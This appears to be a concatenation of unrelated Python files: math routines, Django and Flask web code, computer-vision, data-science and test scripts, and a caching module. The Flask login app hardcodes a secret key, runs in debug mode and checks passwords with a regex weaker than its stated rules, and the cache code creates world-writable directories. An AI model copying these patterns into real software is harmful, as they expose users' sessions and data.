coefficient *= i
coefficient //= j
i += 1
return coefficient
# Works out coefficients of multinomial expansion
# given polynomial coefficents and power
def multiExpand(coeffsList, powersList, power):
l = len(coeffsList)
if l == 1:
return [coeffsList[0] ** power], \
[powersList[0] * power]
if power == 0:
return [1], [0]
if power == 1:
return coeffsList, powersList
newCoeffs = []
newPowers = []
kList = [power]
for i in range(l - 1):
kList.append(0)
newCoeff, newPower = multiCoeff(power, kList), 0
for i in range(l):
newCoeff *= (coeffsList[i] ** kList[i])
newPower += (powersList[i] * kList[i])
newCoeffs.append(newCoeff)
newPowers.append(newPower)
# kList should now look like [power, 0, ... 0]
# (e.g. [5, 0, 0] for power = 5, l = 3)
# Used to work out multinomial coefficients
while kList[l-1] != power:
# Update kList
if kList[l-2] != 0:
kList[l-2] -= 1
kList[l-1] += 1
else:
i = l - 2
while kList[i] == 0:
i -= 1
kList[i] -= 1
kList[i+1] = kList[l-1] + 1
kList[l-1] = 0
# Update newCoeff, newPower
newCoeff, newPower = \
multiCoeff(power, kList), 0
for i in range(l):
newCoeff *= (coeffsList[i] ** kList[i])
newPower += (powersList[i] * kList[i])
ind = newPowers.index(newPower) \
if newPower in newPowers else -1
if ind > -1:
newCoeffs[ind] += newCoeff
else:
newCoeffs.append(newCoeff)
newPowers.append(newPower)
# Remove terms with zero coefficients
i = 0
while i < len(newCoeffs):
if newCoeffs[i] == 0:
newCoeffs.pop(i)
newPowers.pop(i)
else:
i += 1
return newCoeffs, newPowers
# Works out Qsigma - Q^p
def QsMinQp(a, b, QpC, QpP, p):
QpC.pop(0), QpP.pop(0) # First elements cancel
minQpC = [-el for el in QpC] # Take -Q^p coeffs
# Merge middle term of Qsigma into QsigmaMinQp
ind = QpP.index(p) if p in QpP else -1
if ind > -1:
minQpC[ind] += (a ** p)
else:
ind = 0
while ind < len(QpP) and QpP[ind] > p:
ind += 1
if ind == len(QpP):
minQpC.extend((a ** p, p))
else:
minQpC.insert(ind, a ** p)
QpP.insert(ind, p)
# Deal with last element of Qsigma
ind = -1 if 0 in QpP else -2
if ind > -2:
minQpC[ind] += (b ** p)
else:
minQpC.extend((b ** p, 0))
# Pop first terms if zero
while minQpC[0] and minQpC[0] == 0:
minQpC.pop(0), QpP.pop(0)
# Pop last terms if zero
while minQpC[-1] and QpP[-1] == 0:
minQpC.pop(), QpP.pop()
return minQpC, QpP
# Works out reduction of x^m in terms of powers of tau
# Coefficients containing powers of x capped at x^2
def xPowerExpand(a, b, power, rDict):
p, r, tauCoeffs = power // 3, power % 3, []
# No need to recalculate if this monomial
# is already in the dictionary - just return
if power in rDict:
return rDict[power]
# "Base case" of recursion
elif p == 0:
new = [0 for i in range(0, r)]
new.append(1)
tauCoeffs.append(new)
else:
# May be higher powers of x before reduction
for i in range(p + 1):
new = [0 for j in range(r)]
tauCoeffs.append(new)
for j in range(i + 1):
# Coefficient of x^j on tau^(i-power)
coeff = multiCoeff(p, [p-i, j, i-j]) \
* ((-a)**j) * ((-b)**(i-j))
tauCoeffs[i].append(coeff)
# Working from coefficients on powers of tau
# closest to zero (higher indices)
i = p
while len(tauCoeffs[i]) > 3 and i >= 0:
# Working from coeffs on power of tau
# that are higher powers of x
j = i + r
while j > 2:
# Reduce this power of x by recursion
nCoeffs = xPowerExpand(a, b, j, rDict)
# Merge smaller expansion into main
# expansion to progress reduction
for k in range(len(nCoeffs)):
for l in range(len(nCoeffs[k])):
ind = i + k + 1 - len(nCoeffs)
if len(tauCoeffs[ind]) > l:
tauCoeffs[ind][l] += \
tauCoeffs[i][j] * \
nCoeffs[k][l]
else:
tauCoeffs[ind].append \
(tauCoeffs[i][j] * \
nCoeffs[k][l])
# Remove high power of x from coeff
# of tau term once reduction is done
tauCoeffs[i].pop(j)
j -= 1
i -= 1
rDict[power] = tauCoeffs
return tauCoeffs
# Works out coefficients of polynomial in
# tau = y^-2 after reduction (x^3 = y^2 - ax - b)
def reducePoly(a, b, cList, pList, p, rDict):
# Rewrite given polynomial in terms of tau
# Reduce each power of x in turn and
# combine into a single list of coefficients
# Use first monomial's expansion as a base
expn = xPowerExpand(a, b, pList[0], rDict)
expnStr = expStr(expn, 0)
print(f"Reduction of x^{pList[0]} = {expnStr}")
# Make sure the correct multiple is used
factor = cList[0]
for i in range(0, len(expn)):
expn[i] = [factor * el for el in expn[i]]
# Then add multiples of other lists
for i in range(1, len(pList)):
factor = cList[i]
tmp = xPowerExpand(a, b, pList[i], rDict)
tmpStr = expStr(tmp, 0)
print(f"Reduction of x^{pList[i]} = {tmpStr}")
for j in range(len(tmp)):
for k in range(len(tmp[j])):
expn[j + len(expn) - len(tmp)][k] += \
(tmp[j][k] * factor)
return expn
def rXY(a, b, p):
# reductionDict is a dictionary for tracking
# monomials whose reductions are already computed
reductionDict = {}
# Arrays to represent the polynomial Q(x)
coeffs, powers = [1, a, b], [3, 1, 0]
# Step 1: find Qsigma - Q^p
QpC, QpP = multiExpand(coeffs, powers, p)
QsMinQpC, QsMinQpP = QsMinQp(a, b, QpC, QpP, p)
QsMinQpStr = polyStr(QsMinQpC, QsMinQpP)
print(f"(Qsigma - Q^p) = {QsMinQpStr}\n")
# Step 2: rewrite Qsigma - Q^p in terms of tau
expansion = reducePoly(a, b, \
QsMinQpC, QsMinQpP, p, reductionDict)
return expansion
# Coefficients on Q(x) = x^3 + ax + b; prime = p
a = int(input("Please enter a value for (a) in " + \
"x^3 + ax + b. "))
b = int(input("Please also enter a value for (b). "))
p = int(input("Finally, please enter a prime p " + \
"to determine the field. "))
# Set up arrays to represent Q as a polynomial
coeffs, powers = [1, a, b], [3, 1, 0]
print("\nThe polynomial entered was " + \
f"{polyStr(coeffs, powers)}.\n")
# Output results
rXY_str = expStr(rXY(a, b, p), p)
print(f"\nR(x,y) = {rXY_str}")
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, UserManager, Group
from django.contrib.auth.models import PermissionsMixin
from django.utils.translation import ugettext_lazy as _
from movies_app.model.roles import Roles
class CustomUserManager(UserManager):
def _create_user(self, email, password, **extra_fields):
"""
Create and save a user with the given email, and password.
"""
# if not email:
# raise ValueError('The given email must be set')
# email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, mobile=None, password=None, **extra_fields):
extra_fields.setdefault('is_staff', False)
extra_fields.setdefault('is_active', True)
extra_fields.setdefault('is_superuser', False)
return self._create_user(mobile, password, **extra_fields)
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_active', True)
extra_fields.setdefault('is_superuser', True)
group, created = Roles.objects.get_or_create(name='Superuser')
extra_fields.setdefault('role_id', group.id)
if extra_fields.get('is_staff') is not True:
raise ValueError('Superuser must have is_staff=True.')
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True.')
return self._create_user(email, password, **extra_fields)
class UserPermissionMixin(PermissionsMixin):
is_superuser = models.BooleanField(_('superuser status'),
default=False,
help_text=_(
'Designates that this user has all permissions without '
'explicitly assigning them.'
),
)
groups = None
user_permissions = None
is_staff = False
class Meta:
abstract = True
def get_group_permissions(self, obj=None):
pass
def get_all_permissions(self, obj=None):
pass
class User(AbstractBaseUser, PermissionsMixin):
"""
An abstract base class implementing a fully featured User model with
admin-compliant permissions.
email and password are required. Other fields are optional.
is_active : restrict from login true when login, false is not login
is_superuser/ is_staff : for superuser, admin this is true
is_verified : users in category dealership and showrooms are verified by admin
"""
first_name = models.CharField(_('first name'), max_length=256, blank=True, null=True)
last_name = models.CharField(_('last name'), max_length=256, blank=True, null=True)
email = models.EmailField(_('email address'), null=True, blank=True, unique=True)
username = models.CharField(
_('username'),
max_length=150,
help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
null=True,
blank=True, unique=True
)
is_staff = models.BooleanField(_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'), )
STATUS_CHOICES = (
('active', 'active'),
('inactive', 'inactive'),
('deleted', 'deleted')
)
status = models.CharField(choices=STATUS_CHOICES, max_length=20, default='active')
role = models.ForeignKey(Roles, on_delete=models.SET_NULL, null=True, blank=True, related_name='user_role')
objects = CustomUserManager()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
class Meta:
db_table = 'user'
verbose_name = _('user')
verbose_name_plural = _('users')
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
last_name = self.last_name if self.last_name else ''
first_name = self.first_name if self.first_name else ''
full_name = '%s %s' % (first_name, last_name)
return full_name.strip()
|
import cv2
import imutils
import time
model_path = "face-detection-adas-0001.xml"
pbtxt_path = "face-detection-adas-0001.bin"
net = cv2.dnn.readNet(model_path, pbtxt_path)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
camera = cv2.VideoCapture(0)
frameID = 0
grabbed = True
start_time = time.time()
while grabbed:
(grabbed, img) = camera.read()
img = cv2.resize(img, (900,640))
frame = img.copy()
# Prepare input blob and perform an inference
blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U)
net.setInput(blob)
out = net.forward()
# Draw detected faces on the frame
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
if confidence > 0.5:
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))
cv2.imshow("FRAME", frame)
frameID += 1
fps = frameID / (time.time() - start_time)
print("FPS:", fps)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
|
from django.shortcuts import render
from .lookup import perform_lookup
from django.http import JsonResponse
def search_view(request):
q_params = request.GET
q = q_params.get('q')
context = {}
if q is not None:
results = perform_lookup(q, internal_sort=True)
context['results'] = results
context['query'] = q
return render(request, 'search.html', context)
|
fildir='D:\SQ\log.txt'#查询某结尾,的数值总和
filer_R=open(fildir,'r')
lines=filer_R.read().splitlines()#读取所有信息并去除所以换行符
del lines[0],lines[-1]#去除头和尾
res=[]#保存类型,个数
for line in lines:
r_s=line.split('\t')
file_Type=r_s[0].split('.')[-1].strip()#获取下标0的元素,在通过.截取,获取最后一个元素,去除空格
file_Size=int(r_s[1].strip())#获取第二个元素去除空格,最后要加,所以要转换类型
inFlag=False
for one in res:
if file_Type==one[0]:
one[1]+=file_Size#累加文件数
inFlag=True
break
if inFlag==False:
res.append([file_Type,file_Size])
print(res)
|
#[1] import the modules and data
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from scipy.stats import skew
from scipy.stats.stats import pearsonr
'''
%config InlineBackend.figure_format = 'retina' #set 'png' here when working on notebook
%matplotlib inline
'''
train = pd.read_csv("../input/train.csv")
test = pd.read_csv("../input/test.csv")
#[2] Data preprocessing
all_data = pd.concat((train.loc[:,'MSSubClass':'SaleCondition'],
test.loc[:,'MSSubClass':'SaleCondition'])) #Process the dataset together
#{ rcParams } Set the Image pixel, 'rc' means configuration
matplotlib.rcParams['figure.figsize'] = (12.0, 6.0)
prices = pd.DataFrame({"price":train["SalePrice"], "log(price + 1)":np.log1p(train["SalePrice"])})
prices.hist()
'''We can see that we have transformed srewed values after the log transform'''
#[3] Transform the data
train["SalePrice"] = np.log1p(train["SalePrice"]) #log transform the target
#log transform skewed numeric features:
numeric_feats = all_data.dtypes[all_data.dtypes != "object"].index#If all the data in the column is not object, the column will be selected
skewed_feats = train[numeric_feats].apply(lambda x: skew(x.dropna())) #compute skewness, just for the training set
skewed_feats = skewed_feats[skewed_feats > 0.75]#Choose the numeric column that skewness>0.75
skewed_feats = skewed_feats.index
all_data[skewed_feats] = np.log1p(all_data[skewed_feats])#Transform the chosen columns
#[4] One-hot, fill the missing value and create matrices for sklearn
all_data = pd.get_dummies(all_data)
all_data = all_data.fillna(all_data.mean()) #filling NA's with the mean of the column
X_train = all_data[:train.shape[0]]
X_test = all_data[train.shape[0]:]
y = train.SalePrice
'''
After the simple transform, now using regularized linear regression models
The author tried both l_1(Lasso) and l_2(Ridge) regularization
He also defined a function that returns the cross-validation rmse to evaluate the model
'''
#[5] Model
from sklearn.linear_model import Ridge, RidgeCV, ElasticNet, LassoCV, LassoLarsCV
from sklearn.model_selection import cross_val_score
#{ rmse } root-mean-square error: Measures the deviation between Observed value and Truth-value
def rmse_cv(model):
rmse= np.sqrt(-cross_val_score(model, X_train, y, scoring="neg_mean_squared_error", cv = 5))
return(rmse)
model_ridge = Ridge()
alphas = [0.05, 0.1, 0.3, 1, 3, 5, 10, 15, 30, 50, 75]#Adjusting parameters
# higher { alpha } means more restriction on coefficient 'w'(May improve the generalization performance and avoid overfit)
cv_ridge = [rmse_cv(Ridge(alpha = alpha)).mean() for alpha in alphas]
#Visualization: alphas-rmse
cv_ridge = pd.Series(cv_ridge, index = alphas)
cv_ridge.plot(title = "Validation - Just Do It")
plt.xlabel("alpha")
plt.ylabel("rmse")
#check the Root Mean Squared Logarithmic Error
cv_ridge.min()#The smaller the better
#Next try Lasso
model_lasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005]).fit(X_train, y)
rmse_cv(model_lasso).mean()
#[6] Check the coefficients
'''
Note:
Lasso is that it does feature selection for you - setting coefficients of features it deems unimportant to zero
Check how many features it choose:
'''
coef = pd.Series(model_lasso.coef_, index = X_train.columns)
print("Lasso picked " + str(sum(coef != 0)) + " variables and eliminated the other " + str(sum(coef == 0)) + " variables")
#Take a look directly at what the most important coefficients are
imp_coef = pd.concat([coef.sort_values().head(10),coef.sort_values().tail(10)])
matplotlib.rcParams['figure.figsize'] = (8.0, 10.0)
imp_coef.plot(kind = "barh")
plt.title("Coefficients in the Lasso Model")
'''
These are actual coefficients ’w‘ in your model
It's easier to say why the predicted price is that
'''
#[7] Look at the residuals
matplotlib.rcParams['figure.figsize'] = (6.0, 6.0)
preds = pd.DataFrame({"preds":model_lasso.predict(X_train), "true":y})
preds["residuals"] = preds["true"] - preds["preds"]
preds.plot(x = "preds", y = "residuals",kind = "scatter")
#[8] Add an xgboost model
import xgboost as xgb
dtrain = xgb.DMatrix(X_train, label = y)
dtest = xgb.DMatrix(X_test)
params = {"max_depth":2, "eta":0.1}
model = xgb.cv(params, dtrain, num_boost_round=500, early_stopping_rounds=100)
model.loc[30:,["test-rmse-mean", "train-rmse-mean"]].plot()#visualize the rmse-mean changing
model_xgb = xgb.XGBRegressor(n_estimators=360, max_depth=2, learning_rate=0.1) #the params were tuned using xgb.cv
model_xgb.fit(X_train, y)
#[9] Prediction
xgb_preds = np.expm1(model_xgb.predict(X_test))
lasso_preds = np.expm1(model_lasso.predict(X_test))
predictions = pd.DataFrame({"xgb":xgb_preds, "lasso":lasso_preds})
predictions.plot(x = "xgb", y = "lasso", kind = "scatter")
preds = 0.7*lasso_preds + 0.3*xgb_preds #Take a weighted average of uncorrelated results
solution = pd.DataFrame({"id":test.Id, "SalePrice":preds})
solution.to_csv("ridge_sol.csv", index = False)
|
from demo.app import app
|
from flask import Flask, render_template, request, redirect, session, flash
import re
from mysqlconnection import connectToMySQL
from flask_bcrypt import Bcrypt
app = Flask(__name__)
bcrypt = Bcrypt(app)
app.secret_key = '5153fe473438c82c17e638dd778b6b5e'
email_regex = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
@app.route('/')
def registration():
print(session)
keylist = []
for key in session.keys():
keylist.append(key)
for key in keylist:
session.pop(key)
print(session)
session['title']= 'Login or Register'
return render_template('index.html')
@app.route('/success', methods=['POST'])
def success():
session['title'] = 'Success'
is_valid = True
register = False
db = connectToMySQL('login_registration')
if 'fn' in request.form: # enters into conditional upon registration submit button
register = True
data = {
'fn': request.form['fn'],
'ln': request.form['ln'],
'email': request.form['email'],
}
if len(request.form['fn']) < 1:
flash('Must enter a first name to register', 'fn')
is_valid = False
if len(request.form['ln']) < 1:
flash('Must enter a last name to register', 'ln')
is_valid = False
if not email_regex.match(request.form['email']):
flash('Invalid email address!', 'email')
is_valid = False
if not re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', request.form['pw']):
flash('''Password must be at least 8 characters long, have at least
one uppercase and one lowercase letter, at least one number,
and on special character (@#$%^&+=)''', 'pw')
is_valid = False
elif request.form['pwconfirm'] != request.form['pw']:
flash('Must match above password', 'pwconfirm')
is_valid = False
else:
pw_hash = bcrypt.generate_password_hash(request.form['pw'])
data['pw'] = pw_hash
print(data, '&&&&&&&&&&&&&&&&&&&&&&&')
else: # goes into here if 'fn' not in request dict, so on login -checks password
data = {'email': request.form['email']}
query = 'SELECT pw_hash FROM users WHERE email=%(email)s'
check = db.query_db(query, data)
if bcrypt.check_password_hash(check[0]['pw_hash'], request.form['pw']):
db = connectToMySQL('login_registration')
query = "SELECT * FROM users WHERE email = %(email)s"
user = db.query_db(query, data)
session['user'] = user[0]
session['header_message'] = 'You have successfully logged in!'
else:
return redirect('/')
if is_valid is False: # checks if validation failed for registration
return redirect('/')
if register: # checks if email in db, then runs insert into db for registration
db = connectToMySQL('login_registration')
query = "SELECT email FROM users WHERE email = %(email)s"
check = db.query_db(query, data)
if len(check) > 0:
flash('Email already has an account.')
return redirect('/')
db = connectToMySQL('login_registration')
query = """INSERT INTO users(first_name, last_name, email, pw_hash,
created_at, updated_at) VALUES(%(fn)s, %(ln)s, %(email)s,
%(pw)s, now(), now())"""
db.query_db(query, data)
session['header_message'] = 'You have successfully created an account!'
db = connectToMySQL('login_registration')
query = "SELECT * FROM users WHERE email = %(email)s"
user = db.query_db(query, data)
session['user'] = user[0]
return render_template('success.html') #only renders on successful registration/login
@app.route('/logout')
def logout():
return redirect('/')
if __name__ == "__main__":
app.run(debug=True)
|
"""Test the analog.renderers module."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
try:
from unittest import mock
except ImportError:
import mock
import pytest
from analog import renderers
from analog import Report
from analog.exceptions import UnknownRendererError
class TestRendererBase():
"""The ``Renderer`` baseclass provides utilities for renderer lookup."""
def test_all_renderers(self):
"""For a list of available renderers, use ``Renderer.all_renderers``."""
all_renderers = renderers.Renderer.all_renderers()
assert sorted(all_renderers) == sorted(
['plain', 'grid', 'table', 'csv', 'tsv'])
def test_renderer_by_name(self):
"""Use ``Renderer.by_name`` to retrieve a specific renderer."""
renderer = renderers.Renderer.by_name('plain')
assert isinstance(renderer, renderers.PlainTextRenderer)
def test_unknown_renderer(self):
"""``UnknownRendererError`` is raised for unknown renderer names."""
with pytest.raises(UnknownRendererError):
renderers.Renderer.by_name('unknown')
def test_renderer_abstract(self):
"""``Renderer`` is an abstract baseclass and cannot be used directly."""
with pytest.raises(TypeError) as exc:
renderers.Renderer()
assert exc.exconly() == ("TypeError: Can't instantiate abstract class "
"Renderer with abstract methods render")
class TestRenderers():
"""Test different available report renderers."""
def setup(self):
"""Define report for renderer tests."""
self.report = Report(verbs=['GET', 'POST', 'PATCH'],
status_codes=['2', '4', '5'])
self.report.add(path='/foo/bar/1', verb='GET', status=200,
time=0.1, upstream_time=0.09, body_bytes=255)
self.report.add(path='/foo/bar/1', verb='GET', status=200,
time=0.1, upstream_time=0.09, body_bytes=255)
self.report.add(path='/foo/bar', verb='POST', status=200,
time=0.12, upstream_time=0.12, body_bytes=402)
self.report.add(path='/foo/bar', verb='POST', status=409,
time=0.21, upstream_time=0.20, body_bytes=23)
self.report.add(path='/foo/bar', verb='GET', status=200,
time=0.23, upstream_time=0.22, body_bytes=212)
self.report.add(path='/foo/bar/1', verb='PATCH', status=200,
time=0.1, upstream_time=0.1, body_bytes=320)
self.report.add(path='/foo/bar/1', verb='POST', status=404,
time=0.1, upstream_time=0.1, body_bytes=0)
self.report.add(path='/foo/bar/1', verb='POST', status=404,
time=0.1, upstream_time=0.1, body_bytes=0)
self.report.add(path='/foo/bar/1', verb='POST', status=200,
time=0.2, upstream_time=0.2, body_bytes=123)
def read(self, path):
"""Return should-be output from test output dir."""
output = ''
with open(os.path.abspath(os.path.join(
os.path.dirname(__file__), 'output', path + '.txt'))) as fp:
output = fp.read()
return output
def test_renderer_output(self):
"""Make sure renderer output look alright."""
for output_format in sorted(renderers.Renderer.all_renderers().keys()):
output = self.report.render(
path_stats=True, output_format=output_format)
expected = self.read(output_format)
assert output == expected
def test_svrenderer_py27_stringio(self):
"""Handle that StringIO does not accept newline arg on Python 2.7."""
csvrenderer = renderers.CSVRenderer()
csvrenderer.render
# StringIO has newline argument in Python3.3
with mock.patch('analog.renderers.StringIO') as mock_stringio:
csvrenderer.render(report=self.report, path_stats=False)
mock_stringio.assert_called_once_with(newline='')
# but not in Python2.7
try:
with mock.patch('analog.renderers.StringIO',
side_effect=[TypeError, mock.DEFAULT]
) as mock_stringio:
csvrenderer.render(report=self.report, path_stats=False)
assert mock_stringio.call_args_list == [mock.call(newline=''),
mock.call()]
# NOTE: returning mock.DEFAULT does not return the default MagicMock
# on Python2.7 when using the non-stdlib mock package.
# See: https://code.google.com/p/mock/issues/detail?id=190
except (TypeError, AttributeError) as exc:
# on Python2.7 it's a TypeError, on PyPy it's an AttributeError
message = getattr(exc, 'message', getattr(exc, 'args', None))
if isinstance(message, (list, tuple)):
message = message[0]
if message is None or message not in (
'argument 1 must have a "write" method',
"'_SentinelObject' object has no attribute 'write'"):
raise
|
url = 'https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md'
print 'hr_admin_module'
|
# Loihi modules
import nxsdk.api.n2a as nx
# Official modules
import numpy as np
import logging
from copy import deepcopy
import os
# Pelenet modules
from ..system import System
from ..system.datalog import Datalog
from ..parameters import Parameters
from ..utils import Utils
from ..plots import Plot
from .readout import ReadoutExperiment
from ..network import ReservoirNetwork
"""
@desc: Class for comparing anisotropic nest simulation with anisotropic loihi simulation
"""
class Stream(ReadoutExperiment):
"""
@desc: Initiates the experiment
"""
def __init__(self):
super().__init__()
"""
@desc: Overwrite parameters for this experiment
"""
def updateParameters(self):
# Update patameters from parent
p = super().updateParameters()
return {
# Parameters from parent
**p,
# Experiment
'trials': 1,
'stepsPerTrial': 2000,
# Input
'patchNeuronsShiftX': 44,
'patchNeuronsShiftY': 24,
# Network
'refractoryDelay': 2, # Sparse activity (high values) vs. dense activity (low values)
'compartmentVoltageDecay': 500, # Slows down / speeds up
'compartmentCurrentDecay': 500, # Variability (higher values) vs. Stability (lower values)
'thresholdMant': 1000, # Slower spread (high values) va. faster spread (low values)
# Probes
'isExSpikeProbe': True,
'isOutSpikeProbe': False
}
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from copy import deepcopy, copy
from pickle import HIGHEST_PROTOCOL
import six
import collections
import time
import hashlib
import os
import inspect
from functools import partial
from six.moves import cPickle as pickle
import gc
import stat
from flexp.flow import Chain
from flexp.utils import get_logger
log = get_logger(__name__)
RWRWRW = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH
GB = 1024 ** 3
class PickleMixinP2(object):
"""Add pickling python2 functionality to any class."""
def __init__(self, *args, **kwargs):
self._pickler = pickle.Pickler(-1)
self._pickler.fast = 1
super(PickleMixinP2, self).__init__(*args, **kwargs)
def pickle(self, obj, encode=False):
if encode and isinstance(obj, six.text_type):
obj = obj.encode("utf8")
return self._pickler.dump(obj).getvalue()
def unpickle(self, s):
return pickle.loads(s)
class PickleMixinP3(object):
"""Add pickling python3 functionality to any class.
Unfortunately unicode strings pickled by python2 cannot be reproduced in python3.
"""
def pickle(self, obj, version=-1, encode=False):
if encode and isinstance(obj, six.text_type):
obj = obj.encode("utf8") # convert all string into UTF-8
return pickle.dumps(obj, version)
def unpickle(self, s):
try:
return pickle.loads(s, encoding='utf-8')
except UnicodeDecodeError:
# fallback for very old mdbs
return pickle.loads(s, encoding='bytes')
if six.PY3:
PickleMixin = PickleMixinP3
else:
PickleMixin = PickleMixinP2
class ObjectDumper(PickleMixin):
"""Functionality of this class is used in PickleCache and CachingChain"""
def _object_dump_to_string(self, obj, max_recursion_level, level=0, debug_level=0):
"""Consolidate object with its attributes and their values into ony byte-string.
If object has PickleCacheBlackList class attribute then attributes listed there are not taken into account.
:param obj: Object instance
:param int level: recursion level
:param int debug_level: debug_level 0 (silence), 1 or 2 (full)
:return: unicode String image of the pickled object
"""
if level > max_recursion_level:
return "".encode("ASCII")
dump_string = obj.__class__.__name__.encode("ASCII")
if debug_level == 2:
print("\t"*level+"level: {}, class name {}".format(level, dump_string))
if hasattr(obj, '__name__'): # to distinguish functions from each other
dump_string += obj.__name__.encode("ASCII")
if debug_level == 2:
print("\t"*level+"level: {}, function name {}".format(level, obj.__name__.encode("ASCII")))
# Get insides of the objects, based on the type
if isinstance(obj, str):
if debug_level == 2:
print("\t"*level+"level: {}, obj is str: {}".format(level, obj))
return dump_string + obj
else:
try:
items = copy(vars(obj))
if hasattr(obj, 'PickleCacheBlackList'):
if debug_level == 2:
print("\t" * level + "obj has blacklist", obj.PickleCacheBlackList)
for v in obj.PickleCacheBlackList:
del items[v]
items = sorted(items.items())
except:
try:
items = sorted(obj.items())
except:
# Try to sort the items.
try:
items = [(str(i), o) for i, o in enumerate(sorted(obj))]
except:
# After all fails, do not sort the insides, but this can be bad.
# Print log that this happens.
items = [(str(i), o) for i, o in enumerate(obj)]
if len(items) > 0:
log.debug("Can't sort insides of object type {}, first element is {}".format(obj.__class__.__name__, items[0][1].__class__.__name__))
if debug_level == 2:
print("\t"*level+"level: {}, items: {}".format(level, items))
for attribute, value in items:
try:
if debug_level == 2:
print("\t" * level + "level: {}, attribute: {}".format(level, attribute))
try:
add_string = self._object_dump_to_string(attribute, max_recursion_level, level + 1, debug_level)
except:
add_string = self.pickle(attribute)
dump_string += add_string
except pickle.PicklingError: # attribute could not be dumped
pass
try:
if debug_level == 2:
print("\t" * level + "level: {}, value: {}".format(level, value))
try:
add_string = self._object_dump_to_string(value, max_recursion_level, level + 1, debug_level)
except:
add_string = self.pickle(value)
dump_string += add_string
except pickle.PicklingError: # attribute could not be dumped
pass
if debug_level > 0 and level == 0:
print("dump_string is {}\n"
"Compare this with another cache hash with command\n"
" $ cmp -bl <(echo -n abcda) <(echo -n aqcde)".format(hashlib.sha256(six.binary_type().join([dump_string])).hexdigest()))
return dump_string
class PickleCache(Chain, ObjectDumper):
"""
Caches the data processed by the given chain. Cached data are stored in the given directory as pickle files.
File names are the hash od data.id and chain hash.
"""
def __init__(self, directory, data_key="id", chain=None, force=False,
max_recursion_level=10, dir_rights=0o777, debug_level=0, save_cache=True):
"""
:param directory:
:param data_key:
:param chain:
:param boolean force: if True then will not read the cache
:param max_recursion_level:
:param dir_rights:
:param int debug_level:
:param boolean force: if True then will dump the cache
"""
super(PickleCache, self).__init__(chain)
self.directory = directory
self.force = force
self.data_key = data_key
self.max_recursion_level = max_recursion_level
self.debug_level = debug_level
self.chain_info = {'chain_len': 0, 'chain_hash': None,
'chain_mtime': None,
'chain_repr': None}
self.save_cache = save_cache
# update chain info
if chain is not None:
self.hash_chain()
if not os.path.exists(directory):
# Override umask settings to enforce flexible rights. 777 enables collaboration between people and prevents
# omnipresent AccessDeniedErrors.
original_umask = None
try:
original_umask = os.umask(0)
os.makedirs(directory, dir_rights)
finally:
if original_umask is not None:
os.umask(original_umask)
def step(self, data):
# TODO write step method or get rid of step altogether, as Inspector is not much used
pass
def get_cache_file_from_id(self, data_id):
key = hashlib.sha256(self.pickle(data_id)).hexdigest()
return self.directory + "/" + key + self.chain_info['chain_hash']
def get_cache_file(self, data):
key = hashlib.sha256(self.pickle(data[self.data_key])).hexdigest()
chain_hash = self.chain_info['chain_hash']
return self.directory + "/" + key + chain_hash
def check_cache_exists(self, data):
"""
:type data: dict
:rtype: bool
"""
file = self.get_cache_file(data)
log.debug("Cache: {}".format(file))
return os.path.exists(file)
@staticmethod
def hash_dump_string(dump_string):
"""
Takes unicode string and create sha256 hash
:param dump_string:
:return string:
"""
return hashlib.sha256(six.binary_type().join([dump_string])).hexdigest()
def _get_chain_hash(self, chain):
"""Create a unique hash for each chain configuration.
It takes into account values of inner attributes of each object.
:param chain: list of modules
:return: string
"""
# todo if like this then PickleCache(m1, m2) + PickleCache(m3) != PickleCache(m1, m2, m3)
chain_string = self._object_dump_to_string(chain, self.max_recursion_level, debug_level=self.debug_level)
return self.hash_dump_string(chain_string)
def _get_object_mtime(self, obj):
"""Extract mtime from object's source file.
:param obj: Object instance
:return: float Time of the last modification of the source file on an object
"""
try:
mtime = os.path.getmtime(inspect.getsourcefile(obj.__class__))
except (TypeError, OSError):
mtime = 0.
return mtime
def _get_chain_mtime(self, chain):
"""Count time of the last modification of each module and returns their maximum.
:param chain: list of modules
:return: float
"""
chain_mtimes = [0.] # default time in case no other time is obtained
for module in chain:
if isinstance(module, collections.Iterable): # module is a chain
chain_mtimes.append(self._get_chain_mtime(module))
elif hasattr(module, 'process'): # module is an object
chain_mtimes.append(self._get_object_mtime(module))
else: # module is a function
# no time is obtained because the function may be in the main file and its mtime might be undesirable
pass
return max(chain_mtimes)
def _get_chain_repr(self, chain):
"""Concatenate string representations of all modules in the chain.
:param chain: list of modules
:return: string
"""
chain_repr = []
for module in chain:
if isinstance(module, collections.Iterable): # module is a chain
chain_repr.append(self._get_chain_repr(module))
elif hasattr(module, 'process'): # module is an object
chain_repr.extend(
(str(module.__class__), repr(vars(module))))
else: # module is a function
if isinstance(module, partial): # partial function
